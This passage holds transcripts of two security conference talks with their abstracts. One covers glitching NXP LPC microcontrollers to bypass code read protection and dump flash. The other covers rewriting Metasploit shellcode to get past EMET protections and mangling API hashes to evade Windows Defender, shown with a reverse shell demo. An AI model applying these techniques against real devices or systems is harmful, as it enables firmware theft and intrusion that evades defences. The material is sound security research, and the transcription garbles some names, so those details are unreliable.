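    print("bootloader reached - reading flash with a stock ISP tool")
    subprocess.run(["lpc21isp", "-detectonly", "/dev/ttyUSB0", "115200", "12000"])
else:
    print("no ISP response - adjust timing/voltage and try again")
```

The XMega firmware that produces the precisely timed pulse itself is the code on GitHub mentioned just above.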
Yeah so if you're interested you can take a look there hopefully as time goes on I might actually clean it up a little bit and document it a bit better so it'll be a little bit more usable. It's very much a prototype at this point still but as you can see it does work for actually glitching the chip. Something interesting that I saw while I was working on this is that there's an application note from NXP application note 10866 this is for a secondary USB boot loader they do have some chips that have the USB peripheral but they didn't include USB boot loader in their boot ROM so they've provided this application note explaining how you can make your own USB boot loader and it also supports the familiar code read protection levels. What's interesting about this one though is that they only allow read out through this version of the boot loader if the code read protection word is actually set to one specific value that they've defined as no CRP. So we can see here that they've actually made their application note their suggestion for the user boot loader is implemented in a more secure way than their actual ROM boot loader. There's about 4.2 billion fewer possibilities to corrupt the CRP value and actually allow the read out in this case. So clearly somebody is aware that there's some issues with the code read protection but there's not so much that they can do inside the ROM boot loader. Now also another thing that I looked at on this chip was looking closely at the power analysis during startup so I have two oscilloscope screen shots here the first one is showing the startup with no CRP set so there's no read protection enabled and then the second one is showing if I have the code read protection level one enabled. So if I kind of flip back and forth between them you can see that they look almost identical except for the CRP one just past the halfway point there's a little pulse there that's a little bit longer. So we can see there's a slight difference in the code flow between no CRP or CRP level one being set and then if we go back and we look at our disassembly of the boot ROM we can actually see that directly in the startup this is where they're checking if they have the CRP level one set to know if they can enable the debugging interface or not. So we can see from these oscilloscope images exactly where this piece of code is being executed and I didn't actually test this but I expect that this might actually be an even easier target than the serial boot loader to try and unlock the chip because if you can corrupt this value that's being written to the undocumented register 400483F0 then your debugging interface should be enabled so rather than having to deal with the serial boot loader at all you could just plug in the JTAG debugger and read out the flash directly from this. Again it's clear from the code that if any other value besides 8.7654321 ends up being written to this register you're going to have a wide open debugging port. So being able to see this code flow difference in the power analysis is quite nice because it gives us an indication exactly when we need to glitch within a few clock cycles. So I took a look also just at the chips directly I did a quick decap of the chips this is an LPC 2148 chip it's one of the older series of LPC chips this one contains the flash boot loader not the ROM boot loader but generally they're all still quite similar they're all the 32-bit ARM chips. 
In the corner of the chip we have the part number logo for the chip so again this is the LPC 2148. Just for comparison now this is one of the newer series the LPC 1343 we have again a nice logo and a part number in the corner very easy to identify the chip in another corner we have a nice little piece of artwork here. So looking more towards the middle of the chip where we have the actual circuitry this is from the LPC 2148 and we can see that the circuitry is quite dense so for an invasive attack with probing I'm sure it can be possible but it would need fairly advanced equipment it's going to be tough just to put a needle directly down on top of a chip like this. Also we can see a lot of these sort of rectangular pieces of metal there because any of the metal any of the areas on the top layer that don't have metal they filled in with filler to keep the chip well planarized. So areas on the top layer of the chip that are empty are covered with metal like this so we have actually not much access to the bottom of the chip without further deprocessing and when it glitches possible there's not really much reason to actually do an invasive attack but because it's so covered in metal this does make it more difficult if you want to do a laser attack or anything like this I mean maybe it can still be possible but it's a lot harder to do that kind of thing when you don't actually have access to the transistors below. So yeah this is quite dense this is the 2148 and the newer chips are even smaller so from an invasive perspective it's a little bit difficult to work on this chip unless you have high end equipment but the glitching works great so the non-invasive attack is definitely the way to go. These chips are quite easy to get to glitch and because you can read out the boot ROM so easily and it's set up in such a simple way it's a nice target and it's quite easy to unprotect these chips. So that's about all that I have I hope that I've been able to show how easy it is to build a simple glitcher to set it up. You can get a lot more advanced than this personally I like to do it the simple easy cheap way and it works good enough. You can get more precise with your glitch timing and with different glitch waveforms and all of this kind of thing but I mean in this case all you need is a 1max4619 and a power supply and you can find that you can have an effect on the chip very quickly and then it's just a matter of finding your target location which again with the power analysis makes it very easy and the code is quite simple. So the bottom line is don't trust the code read protection too much on these chips but it's not really too specific to the NXP LPC family. Generally a lot of the basic microcontrollers are set up in similar ways the locks tend to be quite fragile so I'm not really intending to pick too much on this family of chips this is just a nice example to work with. Most of the simple microcontrollers that have a boot ROM with a boot loader inside will have similar defects to this that if you're able to find a way to glitch the chip then probably you can bypass it in the same way. Hi I would like to ask do you provide the clock from the Glitzer circuits to the MCU as well or is it running from an internal RC oscillator? Yes that's something that I glossed over for sure. These chips are generally running from the internal RC oscillator. Some of the family do need an external clock the LPC 2148 for example runs off an external clock. 
In general the whole family does support the external clock but during the boot ROM it's running off of the internal clock. So for my testing I didn't even supply a clock signal to it because it had no effect at the time of the program that I was looking at. The LPC 2148 when I worked on that one something that I did find that was worth noting was that the development board that I was using had a 12 megahertz oscillator on it which I was able to still glitch the chip but when I increase the oscillator speed to 16 megahertz the chip becomes much more easy to glitch. So if you have the ability to run from the external oscillator then if you increase it to kind of the highest level that you can the chips tend to get easier to glitch but I mean unfortunately for me in this case most of these chips were running from the internal RC oscillator. I have one additional question. Have you tried using the chip whisper? I haven't used the chip whisper. I've heard that it's a good tool but I haven't actually had a chance to get any hands on experience with it. Okay, thank you. Thanks. Hello. Very nice presentation. Thank you especially because it's quite low cost to do this type of attack. I have two kind of related questions. The first one is how long was the glitch campaign when you were searching for the characteristics of the glitch? And the second one, once you find this characteristics of the glitch, what's the success percentage of repeating the attack? So to find the glitch initially on this one I was fairly lucky. I mean this isn't the first chip that I've tried to glitch so I sort of have the strategy that I follow and by loading my test code inside with this for loop that I can target it gives you a nice targeted area where you have a defined effect if you're able to have an effect. So I think within the first day of playing with this chip I was able to see some effects from the glitching and then it took a little bit longer to actually find the precise points to glitch to access the boot loader. But it was fairly quick that I was able to do that. And then the repeatability, so the glitch doesn't necessarily work every time. But if you only need to do one glitch in the program to get to the point where you want and you can try many times then it's not so bad. So I mean in this case I'm having a glitch success rate of maybe 1% but I can make more than 100 attempts in a second so I'm still having success within a second or two. Okay, thank you. This talk focused on a glitch to break out of some kind of loop or bypass a conditional and your previous talk at CCC and in recon last year had you glitching to change like a branch target so you were jumping into a payload in memory. Are you, do you see that certain architectures or certain processor families are more susceptible to certain types of glitches or that you can characterize like what's actually happening in there based on some criteria? On most of the chips that I've looked at I haven't done so much characterization. Typically I'm just looking for something that's going to corrupt an instruction and the exact details I'm not so worried about as long as it doesn't corrupt too much. Depending on the architecture it does make a difference. If you're using a chip with a Harvard architecture where your data memory and your code memory aren't shared then that can make some types of attacks more difficult. 
In this case it doesn't really matter because it's such a simple target but as you mentioned for my previous talk I wanted to actually put a code payload in and have that executed so if that chip had been a Harvard architecture that would have been a lot more difficult to actually get that into an executable area. You can see different effects depending on the type of the chip. So on a risk chip your instructions are going to generally be all the same length so you're going to have most likely some effect on this instruction and then the rest of the code is going to execute normally. If you're on a SysC chip where the op codes are different lengths then you can have an effect where you might cause your op code to be read as an incorrect op code in which case it's going to end up executing from the middle of the next instruction. So in this case you can have a more wildly different code flow. Thank you. Okay.
|
A look at bypassing the Code Read Protection in the NXP LPC family of ARM microcontrollers. This is an example of one of the simple security features found in common microcontrollers, and how it is easily bypassed. The Code Read Protection (CRP) is implemented in bootloader software and can be easily read and disassembled, showing the fragility of the CRP mechanism. This talk describes the path to exploiting the bootloader software, developing and using a simple glitcher. A glitcher is designed, the chip is tested for vulnerability to glitch, and an attack is formulated to disable CRP and enable readout of FLASH contents. As glitch attacks go, this is a simple and ‘beginner-level’ attack which should be easily reproducible. The talk will include hardware and software design, including schematics and source code, for a glitcher able to bypass CRP.
|
10.5446/32393 (DOI)
|
So, why this talk? I think writing shellcode is fun. I've been doing it for a number of years now. And I think it's time to update some of the publicly available shellcode ideas that we have out there. And so there's basically two parts to this talk. There's a background, and then we're going to go into some of the actual more fun topics. So, today I'm going to be targeting Stephen Fewer's hash API. It's either called the hash API or the Metasploit payload hash. Does anybody, who knows what that is out there? Anybody? Hands? Couple hands? Okay. So, it uses a four-byte hash, basically a ROR 13 instruction, a simple rotate. And it has roots that go back to 2003, from skape's Understanding Windows Shellcode paper. And it's really compact, really efficient. It's actually really awesome because it parses the export table, and it works like this. Let me just go ahead and explain it to you. So what it does is it does a call over the actual hash API. It goes into the actual payload logic. And then there's a very strict API for how this works. It will pop the return address into EBP. And so it will push everything — for x86, it will push everything onto the stack — and then it will make a call to EBP. So it goes into the hash API itself. Then it's going to parse the export address table and jump into the Windows API. And then it will return back to the payload logic. And it will continue until there's no more payload logic and you have done whatever you wanted to do. So, there have been some defeats. Now, remember, I don't know if I mentioned it, but the hash API came out in August 2009. Okay, so just keep that in mind. You can defeat the hash API with EMET. I mean, there are many, many mitigations in EMET, right? And if you can get to the payload, you have to bypass a number of things. There's going to be a couple things to stop you, and we're going to go into that. There's also Piotr Bania — I butcher names, that's my job — but this Phrack article is great because it talks about hash collisions. And there was actually a tool that came out called HAVOC, halting attacks via obstructing configurations. It was a DARPA Fast Track tool that was made by Digital Operatives. And what it does, it will inject a DLL first in the loaded modules list, and it will contain pre-computed collisions so that once you start to walk the export table, you would crash instead of getting successful exploitation. And then there's Control Flow Guard and Return Flow Guard, and we're not really going to talk about those in this talk because it's a different beast. So specifically, I think EAF, and later Caller, were introduced to stop the hash API call. If you see here, EAF was introduced in 2010, like very quickly after. And it basically stops the reading of the export table via hardware breakpoints. And it's pretty cool. It worked pretty well for a couple of years. But then they added, in 2014, the plus — EAF+ — and that includes kernelbase. Then Caller, that was introduced in 2013. And what that does, it blocks any returns or jumps directly into a Windows API. So it's more of an anti-ROP mitigation. But if you remember when I quickly explained how the hash API works, it does a jump from the hash API into the Windows API. So these two protections actually mitigate against the hash API itself, because it does a jump into the Windows API. So technically, EMET — or EMET, I pronounce it two different ways, however I'm feeling — is considered end of life. It is going to end July 31st, 2018. But it still works.
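The four-byte hash being described here is the well-known ROR-13 convention over module and export names. As a small illustration (reconstructed from the published block_api convention, not taken from this talk), the hashes can be precomputed offline like this:

```python
# Sketch: computing Stephen Fewer-style ROR-13 API hashes offline.
# Published convention: hash the module name uppercased, as UTF-16LE including
# the terminating null, then the export name as ASCII including its null, each
# with a byte-wise rotate-right-by-13, and add the two 32-bit results.
def ror32(value, count):
    value &= 0xFFFFFFFF
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF

def ror13_hash(data: bytes) -> int:
    h = 0
    for b in data:
        h = (ror32(h, 13) + b) & 0xFFFFFFFF
    return h

def api_hash(module: str, function: str) -> int:
    mod = (module.upper() + "\x00").encode("utf-16le")
    fun = (function + "\x00").encode("ascii")
    return (ror13_hash(mod) + ror13_hash(fun)) & 0xFFFFFFFF

if __name__ == "__main__":
    # kernel32.dll!WinExec is commonly listed as 0x876f8b31
    print(hex(api_hash("kernel32.dll", "WinExec")))
```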
And you can see, I say, it depends on your threat model, because this is the recent Tor browser exploit versus EMET. So if some of these people that were doing the things that they shouldn't have been doing had EMET, they wouldn't have even gotten to the payload, because this is a stack pivot mitigation. So they were using a stack pivot to get to the payload. And so if they had a better payload, or paid more for the payload, they wouldn't have this issue, right? So EMET does still work. And it's kind of the case where it's like the iPhone in your pocket, because it's easy to implement, versus Control Flow Guard where developers have to compile it in. I think Edge is the only browser that has it right now. So, there have been several bypasses for EMET EAF+. SkyLined, on his Skypher blog — I had to actually go to archive.org because the blog is no longer up, and I'm sad, it was a great blog — described a ret-to-libc style bypass using NTDLL, and I believe it was hard-coded addresses. My slides are going to be available and the links are in there if you want to check it out. And then there's Piotr. He also had a blog post on erasing the hardware breakpoints using NtContinue, and with that, you know, no more hardware breakpoints, no more Export Address Filtering. And then Offensive Security had a very similar bypass: there was an EMET function that would call ZwSetContextThread, which would also zero the hardware breakpoints. And the Caller check is much easier. Jared DeMott in 2014 — all he had to do, if you get the address of LoadLibraryA, is move it into a register and then dereference it back into the register, and you can call it directly. So pretty easy. Now after reading Jared's paper, I decided to put this into BDF itself, the Backdoor Factory. So I made some import address table payloads that would use the actual thunks that were in the import table directly. And this bypassed the EMET EAF and Caller checks. And later on I actually added patching of the import address table so that I could add whatever APIs I wanted at any time. But, you know, this wasn't everything I wanted to do, because I wanted to actually do some position independent import address table payloads to see what would happen. So this was, you know, fast forward to December 2014. So I do some research, I'm looking around at, you know, what's been done, prior work. And so skape, Matt Miller — I think he might be on the EMET team, I'm not sure, I know he works at Microsoft on the mitigation work — in his paper he talked about parsing the import address table — not import address table, export address table — and getting LoadLibrary, loading a DLL so that you had everything you needed in that one DLL, like ws2_32, and you could just call the APIs directly in that DLL. There were a couple of issues with it if you look at it from an EMET perspective, because you had to parse the export address table. So that was kind of a non-starter. And then there was Piotr — Piotr Bania, I mean this guy has done a lot of work, it's pretty amazing. Same Phrack article, he talks about an import address table parser, and that was enough to get me started. And here's the actual code, and I don't know what operating system it was for, I think it might have been XP Service Pack 1 or 2, but it got my head going to where I could understand what I wanted to do.
So I wrote my own stub and basically what it does, it finds PB, P header, import table RVA, and then loops through and finds kernel 32, but it used ANSI string matching, right? And then you go on to the next slide. I add, next I'll go through and find load library and get process address, but what I added at the top is a set bounce check because once you're, if you're looping through the import table, sometimes the memory address where you're going to read is out of bounds. And so I added a FF00000 check to make sure that I did not go out of bounds. So this actually worked pretty good. It was very stable. And so I bolted on a reverse TCP shell and I bypassed caller EAF checks and the POCs that I was running. And so then I was like, oh, this is cool, I'll email the EMET team. And this was their response, pretty much. So apparently they knew about import table parsers. I mean, they get millions of crash dumps in month, I'm sure. So they had to know, right? And so my POC was limited just to load library and get process address in the import table of the main module. So I didn't do anything really exciting. So this was December 2014 and I just put it on a file system and just let us sit there. Just kind of went back to real life and work. And I'll just look at it Twitter. And Casey Smith does a lot of, he executes code in places that you're not expecting it. They're like sign binaries like MS build and stuff like that. So he bypasses white listing solutions. I see him talking about EAF mitigations getting flagged in Excel and I knew exactly what his problem was. So I send him my import address table stuff and we started to collaborate. And the slides are going to be out today and there's a link there. You can go see when I release the code to him. And so he went crazy with this. He was using it everywhere, like everywhere. However, we tried using a PowerShell, which I thought personally was strange because if you're running PowerShell you have full access to the Windows API anyway. But sometimes his POCs have small constraints. So it didn't have low library in the import table. So we started talking about it and we were going to use a loaded module, another DLL in memory. And so he wrote in addition that used the same 4 bytes hash to find DLL in the loaded modules. So you would need to know your target. He borrowed code from the Steven Führer hash API stub. And so the Havoc protection to defeat this, because we did DLL.name. That's what we were using, not just the short name because that wouldn't work. You would actually have to throw up or not throw up, but insert many, many DLLs to cause a collision. And what you're going to see is there are many DLLs at work. So we were both happy with this. So we had two stubs. And we started talking about it. We're like, we knew by this point that if you had get process address anywhere in your module space, any DLL, you could get low library A by getting the kernel 32 handle and then call and get process address with a string load library A. And then you have full access to the Windows API. So then to bypass caller, what we did is we load library A's in EAX, then we would move it, we would push it on the stack and then move the pointer TVX and then we'd call it through an indirect pointer. So now we had four stubs that we could use. So that was pretty good. We were excited about that. But I wanted to know where I could use them. 
So I wrote some scripts that would go through and find anywhere in low library A and get process address was on a Windows system. These were clean systems, nothing really installed. There is going to be some overlap because you have sys file, you know, system 32. But this is a lot. And you can see that Microsoft has made a concerned or somewhat of an effort to decrease the library A and get process address in the import table, which is, you know, pretty cool. And so we had a lot of information. We thought this was cool. So we're going to submit to a conference. And this was about May. And we were like, all right, I think we're ready to submit. And then June, my world fell apart. There was the Angular exploit kit that used get process address from user 32 import address table and fire. I published it and I almost retired. I was pretty depressed. But we decided to go ahead with a blog post because we wanted to release the POC. And one of the things that we had in the POC is we had a dependency walker style. What we would do is part of the script. You give it a binary that your target is and it would use the output from my scans of load library across all these systems and you give it an operating system. And it would go through and recursively look at what is loaded in every DLL. And it would give you an option of what, or not option, but it would tell you what DLLs to use. And so it ended up statically, right? So that was actually kind of cool. But when we released it, we left kind of a bug. We didn't put an exit function. So there was a reverse DCP shell and no exit function. So it crashed right away. And that was definitely by design. And so we talked about it. We're like, you know, we want more payloads. We want to be able to basically reuse what Metasploit has, but it's going to take a lot of work. And I said, you know what, I'm going to do this. I got some ideas and that brings us to the fun part. I had two ideas. First, I was going to remove the steamfuehr hash API stub, replace it with something that I didn't know what. Okay. Or I could build something that would rewrite all the payloads for me. And unfortunately, I decided to rewrite all the things with automation. And so Metasploit payloads follow a specific pattern. It basically works where you push everything onto the stack. This is for the x86 side. The x64 side is very similar, but just different calling, right? So the last thing you push is the actual hash. And then you can call EBP. Pretty straightforward. And so I devised this workflow. My script would take input either via stand in or from file. I would disassemble and I use capstone because I use capstone to bdf and it's really easy to use, right? And then I would capture the blocks of instructions. And so every instruction I would tag with a unique identifier saying, all right, so this is part of this block. So I had everything. I would capture the APIs. I would capture control flow. I would actually go through and when I see a control flow statement, I would give it a unique identifier. And then I would go back through and find the location where that was. And I'd slap a unique identifier on there so I could kind of figure out what was going on without having to do emulation. And I had to protect low library and get process address from being clobbered throughout the entire payload. And I had to figure out how to do that with automation. And I went at it for five days straight, 12 to 15 hour days. And when I solved the problem, more popped up. 
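A rough sketch of that kind of scan — walking a directory tree and recording which PE files carry LoadLibraryA / GetProcAddress in their import tables — might look like the following. The use of pefile is my assumption; the talk doesn't say what the original scripts were built on.

```python
# Sketch of the "where can I use these stubs" scan: walk a directory tree and
# record which PE files have LoadLibraryA / GetProcAddress in their import table.
import os
import sys
import pefile

WANTED = {b"LoadLibraryA", b"GetProcAddress"}

def imported_apis(path):
    try:
        pe = pefile.PE(path, fast_load=True)
        pe.parse_data_directories(
            directories=[pefile.DIRECTORY_ENTRY["IMAGE_DIRECTORY_ENTRY_IMPORT"]])
    except pefile.PEFormatError:
        return None
    found = set()
    for entry in getattr(pe, "DIRECTORY_ENTRY_IMPORT", []):
        for imp in entry.imports:
            if imp.name in WANTED:
                found.add((entry.dll.decode(errors="replace"), imp.name.decode()))
    pe.close()
    return found

def scan(root):
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".exe", ".dll")):
                continue
            path = os.path.join(dirpath, name)
            hits = imported_apis(path)
            if hits:
                print(path, sorted(hits))

if __name__ == "__main__":
    scan(sys.argv[1] if len(sys.argv) > 1 else r"C:\Windows\System32")
```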
Because there were some payloads that weren't very straightforward. They had conditional statements. They would have conditional loops. And I was crossing the threshold where if I would just sat down and wrote these payloads out, probably in that amount of time, I probably could have knocked out 15 to 20 at least because I could have some efficiencies, gain understanding, meet processes. So I decided just to burn it down. I'm like, I'm done. I'm going to go to the original idea that I had, the first idea. And that was to replace the impure hash API with something else. So what I came up with was this is the original, right? We have the hash API plus actual payload logic. And I decided to use the import address table stub and then offset table. And because you have to translate the four byte hash to something, if you're not using the export table, you have to figure out what it is. So what I did is I took all the APIs and then I unique them, put them in a string. So, but I had some requirements. I had to keep it, had to be useful in read execute memory, not just read write execute, in case I put it into an executable where the section was only read execute, right? So no encoding within the payload itself without moving it to a stack or some other location. And try to keep it as small as possible. Now, import table parsing is much more expensive than export table parsing. And I had to support any Metasploit shell code that used the former hash API. So the first four steps are the same, right? Take input, disassemble, capture blocks, capture APIs. So I reused some code. So that was good. But then I had to build a lookup table and then I had to find the appropriate import address table for the executable. And then I have to have appropriate output for whatever you need it for. So the offset table approach works as follows. You can see here you have four byte sections followed by two byte, one byte, two blocks. And the first byte is the DLL. That's the location from that point to the ASCII or the ANSI representation of what should be called. And the API, same thing. So this is an example of a string. And so all these are null terminated. It makes it very easy once you push it onto the stack. And you get some code reused out of this because I unique the string so there's no repeats, right? So you see here this is calling kernel 32. And the next API is when exec. Then I'm calling kernel 32 again. And the next API is exithread, so on, so forth. So there is some reuse. And I thought that was going pretty well. So this is the code. Pretty straightforward. I think everybody understands it by now. But so how it worked was you jump over the lookup table. I checked the first hash in the lookup table and then I continue until there's a match. And it found I move the DLL offset to AL. I normalize and use low library to get the actual, to load the DLL memory. And then I will save the DLL handle. I'll put the API offset in AL on normalize. Then use get process address to get the Windows API handle. And then I have to repair to call the Windows API. So I clear the stack. I save EAX down the stack so then when I do a pop AD it ends up back in EAX. I save the return address to EBP because it's not clobbered. And then I call the Windows API by calling EAX. On the return, when I come back, I fix up the EBP to point back to the beginning of the import table stub. And then I return back to the payload logic. So if you're going to look at it from like a, just an image, you can see here I'm going to do a call over. 
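As a sketch of the offset-table idea just described — a 4-byte hash followed by two one-byte offsets into a deduplicated, null-terminated string blob — the table could be generated offline roughly like this. The exact byte layout here is my reading of the talk, not necessarily FIDO's actual format.

```python
# Build the lookup/offset table: each entry is the original 4-byte API hash
# followed by a one-byte DLL-string offset and a one-byte export-string offset
# into a deduplicated, null-terminated string blob.
import struct

def build_tables(api_calls, hash_func):
    """api_calls: ordered list of (dll, function) pairs the payload uses."""
    blob = bytearray()
    offsets = {}

    def intern(s: str) -> int:
        # Deduplicate strings so e.g. "kernel32.dll" is stored only once.
        if s not in offsets:
            offsets[s] = len(blob)
            blob.extend(s.encode("ascii") + b"\x00")
        return offsets[s]

    table = bytearray()
    for dll, func in api_calls:
        dll_off = intern(dll)
        api_off = intern(func)
        if dll_off > 0xFF or api_off > 0xFF:
            raise ValueError("string blob too large for one-byte offsets")
        table += struct.pack("<IBB", hash_func(dll, func), dll_off, api_off)
    return bytes(table), bytes(blob)

# Example (hash_func could be the ROR-13 routine sketched earlier):
# table, strings = build_tables(
#     [("kernel32.dll", "WinExec"), ("kernel32.dll", "ExitThread")], api_hash)
```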
Just like Steven Fierce hash API or the Metasploit payloads. I do a call over. And then I pop EBP. Well, at this point it is the Metasploit actual logic of running the show. So then I return back into the import address table stub. And I try to not go back to the beginning of the stub every time. I try to stay within, just go to the lookup table. And with all the different payloads, even I got it down to one register where I could push the two values, low-lubbary A, and get a process address onto the stack, and call from one value, just do an offset plus one or plus four. But the problem was is that it would just get clobbered when I went to a more complicated payload. So I have to go back to the beginning of the import address table finding stub. So then you will call, I would actually do a call instead of a jump to the Windows API, return back into the lookup table, and then do a return to the payload logic, and then continue until there's no more payload logic. Right. So the initial POC only took 12 hours to make the offset table, to design it, everything, took about 12 hours. Adding the workflow, yeah, it took about another 12. Finalizing the tool, you don't even talk to me about it. It took a lot of time. But I'm happy where it's going. And what's really fun about this is now the API hashes are, besides getting them the first time, now the API hashes are completely meaningless. After I figure out what APIs there are, I can do whatever I want with them, and come to find out that antiviruses depend on them for signatures. Yeah. And I can, you know, think about what happens if we mingle them. So I added the ability to mingle the hashes. So let me show a demo of that. So the first thing I'm going to do is just run MSF Venom, do a reverse TCP shell, and I'm going to put it into a straight binary file. Just normal binary output. All right. Now I'm going to use FIDO, I call it FIDO. I'm going to cat the, I'll put the binary format into FIDO, and I'm going to call low library A, get process address, and that's for the main module. And because I'm targeting a certain binary, I know that low library A, get process addresses in the import table of executable that I'm targeting. So you can see here that I stripped off Steven Führer's hash API call. This is simple to payload, and I print out what APIs are being used. And then I show the string table, just kind of a check, and then I go through and do all the rest. Now I'm going to use Backdoor Factory to append a section and throw it on the VM. And of course, AV flags it right away. This is Windows Defender. I'm going to do the same thing, except I'm going to use dash m for mangle. You can see I go through and show that I'm mangling each hash. And then what I do is I go into the actual payload logic and I update the hash as the match. It did not catch it right away, so I set up a net cat listener. And there you have it. All right. So as you already know, this is called FIDO, just because I couldn't think anything creative. So it accepts stand in, and it will process the payload based on target executable, and that will be in the next demo. Or you can provide, if you know about the target executable, you can provide what you want to use. So if you want to, you know it has a get process address, you just say GPA. And then you can actually, with slash B, you can provide the target binary. It will go through and do a dependency walker style recursive look at all the DLLs. You can get a target OS because it does matter. 
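The mangling step shown in that demo boils down to swapping every known hash for a random value, consistently, everywhere it appears. A minimal sketch, assuming each hash occurs as a unique little-endian 32-bit constant in the payload logic and the lookup table:

```python
# Sketch of the "-m" mangle idea: once every hash in the payload is known, swap
# each one for a random 4-byte value in both the payload logic and the lookup
# table, so AV signatures keyed on the well-known constants no longer match.
import os
import struct

def mangle_hashes(payload: bytes, lookup_table: bytes, hashes):
    mapping = {h: struct.unpack("<I", os.urandom(4))[0] for h in hashes}

    def rewrite(blob: bytes) -> bytes:
        out = bytearray(blob)
        for old, new in mapping.items():
            old_b, new_b = struct.pack("<I", old), struct.pack("<I", new)
            i = out.find(old_b)
            while i != -1:
                out[i:i + 4] = new_b
                i = out.find(old_b, i + 4)
        return bytes(out)

    return rewrite(payload), rewrite(lookup_table), mapping
```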
And I have XP vista 7, 8, and 10 with all those dependent, like with all the low library stuff. I do need to update it based on stuff I found within the last couple days, which is pretty exciting. And then you can either take stand in or you can give it a code. And I'll show you what D and L stand for in a second. But yeah, we'll go over that. And then you have different, you can, you can mingle like I just showed, you can have different outputs such as C, Python and C sharp output. And the normal output is stand out binary format, raw binary format. And you can pick your parser stubs. And so you have GPA, LL, GPA, low library, get process address. And you have extern. So if you're going to use an extern, you need to know what DLL you're targeting that's in memory and what import table or what part of the import table. And there's only two options. And so with testing, I had a lot of issues with some core DLLs, like on Windows seven. And I was building a blacklist just to avoid them. And it kept growing. And I was starting to worry what was going on. And it was only, like I said, Windows seven through 10. And if you, if you look, you see kernel 32 there. And I thought it was weird that kernel 32 had get process address. And it's import table. So I just ignore it. I thought it was just a bug. Come to find out it was the API MS win core DLLs. And these are the exposed implementation of the Windows API. And they've existed since Windows seven. And get process address is implemented as well as low library. And I'll go into that in a second. But get process address is implemented in the library loader. There's, there's like some letters and some numbers behind it. DLL. And they're normally used in system DLLs because it's for portability reasons. And they're, it's in every process. Like these are in every process. And it's predictable. They are, they are, and you can use them if they're in the import table of a DLL. Yeah, I tested that. And it's, it's actually pretty cool. And it's everywhere. It is, I don't know if I can state this enough. It's in every process because it's in kernel 32. So there's a view of kernel 32. You can see the API MS win loader, or win core library loader DLL. And you see get process. And it's in the import table. So let me just explain kind of what, what we're talking about here. All we need is get process address in any DLL import table to access the entire Windows API through import table parsing. Since Windows 7, there's been get process address in kernel 32 import table. So we've had a very stable EMAT, EAF, and caller bypass opportunity since Windows 7. Which is, I haven't heard anyone using this. So I think this is pretty cool. And by the way, get process address is nothing but only one. Because within the library loader DLL, there's also library, or load library EX or extended, I think that means extended, EXA. And the difference, they're basically the same. Low library A is low library EXA with a zero as a third flag. So that's what, when you call it low library A, that's, that's what's being handled. And this is completely reliable on Windows 7. I found, I don't have a Windows 8 VM on me right now. I can't test it, but it's not reliable on Windows 10, not yet. And, and yeah. But you can, you can actually use this. It's pretty great. So I have a demo with the Tor browser, the recent one. All right. So for, what I'm going to show you here is I went ahead and disabled the stack pivot check. I'm going to run the original exploit. Show you that EAF gets flagged. 
Okay. You can see at the bottom there. Now, if you were to bypass EAF and caller, we get flagged. Unless you were to completely bypass or change it. So let me just point this out real quick. So what I did is I get, I took the Firefox executable. That's what Tor browser is using. I did a slash B. And what it did, what my script is doing right now is checking for Windows 7 compatibility. And I'm going through and, and actually doing the recursive parsing to figure out what would be loaded in memory. Now, it's not going to look at the, the custom DLLs that come with Firefox. It's just looking at what is in the system. So the output, as you can see, it'll show the, what low library, low library and get process minors are available. So these DLLs have these two APIs in their import table. And then you'll see GPA binaries available. And you can see that I've outlined the API MS win core DLLs. And so you can use these. And I, I think that's what I'm going to do next in the, the video list. So I'm going to use kernel 32. And I, I am, yeah, I'm using kernel 32. And it's using X-turn GPA. So I'm using the get process address in kernel 32 in the API MS win loader DLL that's in the import table. And what I'm pushing that through, I call it the Tor browser encoder. It's because it needs to be a JavaScript object. And so I'm just, it happens to be a Python list. And so I just print the Python list. And I'm, what I, what I did here next is I just put the, put the list there in a JavaScript script. And then I've already copied it over. So I'm going to come uncomminent and then execute the payload to demonstrate that EAF was bypassed. EAF and color. There you go. All right. So there are some issues, not necessarily with my strip. So if you're using Metasploit and you're using your, you have Emmett, right? So my, my, my, my API is compatible with Metasploit. And I'm using the same interpreter with the stage payloads that have the hash API call. The problem is Emmett, right? So whenever you get a stage payload coming back over the second stage, if you're, you're doing multi-stage, it's going to have Steven Führer's hash API call. So it will fail. So Metasploit needs to be, to, to make this fully compatible, you need to run, run your own version of Metasploit or, or we update Metasploit. And it will take a lot of work. I also have to do, for parity, I have to do Windows X64 side of the house. So yeah, that's, that's pretty much all I have. As far as control flow guard, return flow guard implications, I cannot make an intelligent assessment on that at this point. I don't know enough what the impact could be. So the code is going to be there. I'm going to release it here in the next couple of minutes. Any questions? All right. Well, thanks.
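The dependency-walker-style pass described in this demo can be approximated as a recursive walk over a target's imports, reporting which modules would bring LoadLibraryA / GetProcAddress into the process and flagging the api-ms-win-* forwarders along the way. This is only a naive illustration — real loader behaviour (api-set resolution, KnownDLLs, SxS) is not modelled here.

```python
# Rough sketch of the recursive dependency walk: follow a target binary's
# imports out of a system directory and report which modules have
# LoadLibraryA / GetProcAddress in their own import tables.
import os
import pefile

WANTED = {b"LoadLibraryA", b"GetProcAddress"}

def walk(path, search_dir, seen=None, report=None):
    seen = set() if seen is None else seen
    report = {} if report is None else report
    try:
        pe = pefile.PE(path, fast_load=True)
        pe.parse_data_directories(
            directories=[pefile.DIRECTORY_ENTRY["IMAGE_DIRECTORY_ENTRY_IMPORT"]])
    except pefile.PEFormatError:
        return report
    hits = set()
    for entry in getattr(pe, "DIRECTORY_ENTRY_IMPORT", []):
        dll = entry.dll.decode(errors="replace")
        hits |= {imp.name.decode() for imp in entry.imports if imp.name in WANTED}
        if dll.lower().startswith("api-ms-win-"):
            hits.add(f"(api-set forwarder: {dll})")
        child = os.path.join(search_dir, dll)
        if dll.lower() not in seen and os.path.exists(child):
            seen.add(dll.lower())
            walk(child, search_dir, seen, report)
    if hits:
        report[os.path.basename(path)] = sorted(hits)
    pe.close()
    return report

# e.g. walk("firefox.exe", r"C:\Windows\System32") -> {"kernel32.dll": [...], ...}
```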
|
Metasploit x86 shellcode has been defeated by EMET and other techniques not only in exploit payloads but through using those payloads in non-exploit situations (e.g. binary payload generation, PowerShell deployment, etc..). This talk describes taking Metasploit payloads (minus Stephen Fewer’s hash API call), incorporating techniques to bypass Caller/EAF[+] checks (post ASLR/DEP bypass) and merging those techniques together with automation to make something better. There will be lots of fail and some win.
|
10.5446/32394 (DOI)
|
